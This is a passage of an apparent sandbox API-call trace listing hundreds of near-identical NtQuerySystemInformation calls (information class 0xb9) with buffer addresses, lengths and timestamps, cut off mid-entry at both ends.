NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x20, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x20, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x20, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x20, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x20, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x58, ResultLength=0x0) [0241.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x38, ResultLength=0x0) [0241.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x28, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x28, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x28, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x28, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef60, Length=0x28, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x38, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x38, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0241.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x28, ResultLength=0x0) [0241.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x38, ResultLength=0x0) [0241.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x38, ResultLength=0x0) [0241.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee50, Length=0x20, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x20, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x20, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x20, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f020, Length=0x20, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x38, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef40, Length=0x20, ResultLength=0x0) [0241.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x20, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x20, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x20, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x38, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef40, Length=0x20, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x20, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x20, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x20, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x38, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef40, Length=0x20, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x20, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x20, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f450, Length=0x20, ResultLength=0x0) [0241.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 